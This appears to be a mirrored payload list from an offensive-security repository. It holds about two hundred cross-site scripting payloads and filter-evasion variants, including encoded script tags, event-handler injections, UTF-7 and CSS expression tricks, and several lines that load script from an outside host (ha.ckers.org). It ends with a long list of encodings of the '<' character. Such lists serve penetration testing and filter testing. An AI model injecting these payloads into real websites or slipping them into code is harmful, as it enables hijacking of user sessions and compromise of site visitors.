mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
203 lines
7.9 KiB
Plaintext
203 lines
7.9 KiB
Plaintext
|
%3Cimg/src=%3Dx+onload=alert(2)%3D
|
|||
|
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
|
|||
|
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E
|
|||
|
48e71%3balert(1)//503466e3
|
|||
|
';confirm('XSS')//1491b2as
|
|||
|
a29b1%3balert(888)//a62b7156d82
|
|||
|
<scr	ipt>alert('XSS')</scr	ipt>
|
|||
|
"onmouseover%3dprompt(941634)
|
|||
|
%f6%22%20onmouseover%3dprompt(941634)%20
|
|||
|
" onerror=alert()1 a="
|
|||
|
style=xss:expression(alert(1))
|
|||
|
<input type=text value=“XSS”>
|
|||
|
A” autofocus onfocus=alert(“XSS”)//
|
|||
|
<input type=text value=”A” autofocus onfocus=alert(“XSS”)//”>
|
|||
|
<a href="javascript:alert(1)">ssss</a>
|
|||
|
+ADw-p+AD4-Welcome to UTF-7!+ADw-+AC8-p+AD4-
|
|||
|
+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-
|
|||
|
+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-
|
|||
|
<%00script>alert(‘XSS’)<%00/script>
|
|||
|
<%script>alert(‘XSS’)<%/script>
|
|||
|
<%tag style=”xss:expression(alert(‘XSS’))”>
|
|||
|
<%tag onmouseover="(alert('XSS'))"> is invalid. <%br />
|
|||
|
</b style="expr/**/ession(alert('vulnerable'))">
|
|||
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|||
|
'';!--"<XSS>=&{()}
|
|||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|||
|
<IMG SRC="javascript:alert('XSS');">
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|||
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC=javascript:alert('XSS')>
|
|||
|
<IMG SRC="jav ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|||
|
<IMG SRC="  javascript:alert('XSS');">
|
|||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|||
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
|||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
|||
|
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|||
|
<IMG SRC="javascript:alert('XSS')"
|
|||
|
<SCRIPT>a=/XSS/
|
|||
|
alert(a.source)</SCRIPT>
|
|||
|
\";alert('XSS');//
|
|||
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|||
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
|||
|
<BODY ONLOAD=alert('XSS')>
|
|||
|
<IMG DYNSRC="javascript:alert('XSS')">
|
|||
|
<IMG LOWSRC="javascript:alert('XSS')">
|
|||
|
<BGSOUND SRC="javascript:alert('XSS');">
|
|||
|
<BR SIZE="&{alert('XSS')}">
|
|||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|||
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|||
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|||
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|||
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|||
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|||
|
<XSS STYLE="behavior: url(xss.htc);">
|
|||
|
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
|||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
|||
|
¼script¾alert(¢XSS¢)¼/script¾
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|||
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|||
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|||
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
|||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
|||
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
|||
|
exp/*<A STYLE='no\xss:noxss("*//*");
|
|||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|||
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|||
|
<!--[if gte IE 4]>
|
|||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
|||
|
<![endif]-->
|
|||
|
<BASE HREF="javascript:alert('XSS');//">
|
|||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|||
|
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
|||
|
a="get";
|
|||
|
b="URL(\"";
|
|||
|
c="javascript:";
|
|||
|
d="alert('XSS');\")";
|
|||
|
eval(a+b+c+d);
|
|||
|
<HTML xmlns:xss>
|
|||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
|||
|
<xss:xss>XSS</xss:xss>
|
|||
|
</HTML>
|
|||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|||
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|||
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
|||
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
|||
|
<XML SRC="xsstest.xml" ID=I></XML>
|
|||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|||
|
<HTML><BODY>
|
|||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
|||
|
<?import namespace="t" implementation="#default#time2">
|
|||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
|
|||
|
</BODY></HTML>
|
|||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|||
|
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|||
|
<? echo('<SCR)';
|
|||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|||
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|||
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|||
|
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
|||
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
|||
|
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
|||
|
<
|
|||
|
%3C
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
<
|
|||
|
\x3c
|
|||
|
\x3C
|
|||
|
\u003c
|
|||
|
\u003C
|